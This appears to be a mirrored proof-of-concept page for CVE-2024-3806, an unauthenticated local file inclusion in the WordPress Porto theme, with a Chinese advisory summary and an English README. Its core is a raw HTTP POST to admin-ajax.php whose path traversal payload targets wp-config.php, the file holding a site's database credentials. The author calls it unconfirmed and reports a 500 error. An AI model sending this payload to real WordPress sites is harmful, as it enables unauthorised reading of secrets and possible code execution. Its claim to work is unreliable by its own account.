CVE-2024-3806 PoC — WordPress theme Porto 安全漏洞

Source

https://github.com/RandomRobbieBF/CVE-2024-3806

Associated Vulnerability

Title:WordPress theme Porto 安全漏洞 (CVE-2024-3806)
Description:WordPress是WordPress基金会的一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress theme是WordPress的一款主题。 WordPress theme Porto 7.1.0 版本及之前版本存在安全漏洞，该漏洞源于都容易通过 porto_ajax_posts 函数受到本地文件包含的影响。

Description

Porto <= 7.1.0 - Unauthenticated Local File Inclusion via porto_ajax_posts

Readme

# CVE-2024-3806
Porto &lt;= 7.1.0 - Unauthenticated Local File Inclusion via porto_ajax_posts

# Description

The Porto theme for WordPress is vulnerable to Local File Inclusion in all versions up to, and including, 7.1.0 via the 'porto_ajax_posts' function. This makes it possible for unauthenticated attackers to include and execute arbitrary files on the server, allowing the execution of any PHP code in those files. This can be used to bypass access controls, obtain sensitive data, or achieve code execution in cases where php file type can be uploaded and included.

Unconfirmed POC
----

```
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: kubernetes.docker.internal
Content-Type: application/x-www-form-urlencoded
Content-Length: 116

action=porto_ajax_posts&post_type=post&extra={"shortcode":"porto_posts_grid","template":"../../../../wp-config.php"}
```

Notes
---

Getting a 500 error at the moment.

File Snapshot


 [4.0K]  /data/pocs/eeb90f41ad849176826e90cfba63660877397f41
└── [ 909]  README.md

0 directories, 1 file

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!